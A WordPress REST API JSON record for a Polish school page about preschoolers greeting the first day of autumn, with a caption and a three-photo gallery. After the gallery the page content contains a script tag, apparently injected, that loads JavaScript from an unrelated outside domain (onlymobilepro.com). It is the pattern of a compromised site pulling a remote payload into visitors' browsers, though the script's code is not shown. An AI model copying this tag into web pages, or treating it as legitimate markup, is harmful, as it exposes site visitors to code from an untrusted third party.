{"id":12498,"date":"2019-09-23T23:48:58","date_gmt":"2019-09-23T21:48:58","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=12498"},"modified":"2020-04-23T09:20:03","modified_gmt":"2020-04-23T07:20:03","slug":"pierwszy-dzien-jesieni-w-przedszkolu","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/ciekawe-zajecia\/pierwszy-dzien-jesieni-w-przedszkolu\/","title":{"rendered":"Pierwszy dzie\u0144 jesieni w przedszkolu"},"content":{"rendered":"<p>Przedszkolaki przywita\u0142y jesie\u0144:<\/p>\n<p><div id='gallery-1' class='gallery galleryid-12498 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/09\/IMG-20190923-WA0006.jpg\" title=\"IMG-20190923-WA0006\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/09\/IMG-20190923-WA0006-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/09\/IMG-20190923-WA0007.jpg\" title=\"IMG-20190923-WA0007\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/09\/IMG-20190923-WA0007-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/09\/IMG-20190923-WA0008.jpg\" title=\"IMG-20190923-WA0008\" data-description=\"\"><img width=\"150\" height=\"150\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2019\/09\/IMG-20190923-WA0008-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" loading=\"lazy\"><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Przedszkolaki przywita\u0142y jesie\u0144:<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":12376,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12498"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=12498"}],"version-history":[{"count":4,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12498\/revisions"}],"predecessor-version":[{"id":15001,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12498\/revisions\/15001"}],"up":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/12376"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=12498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}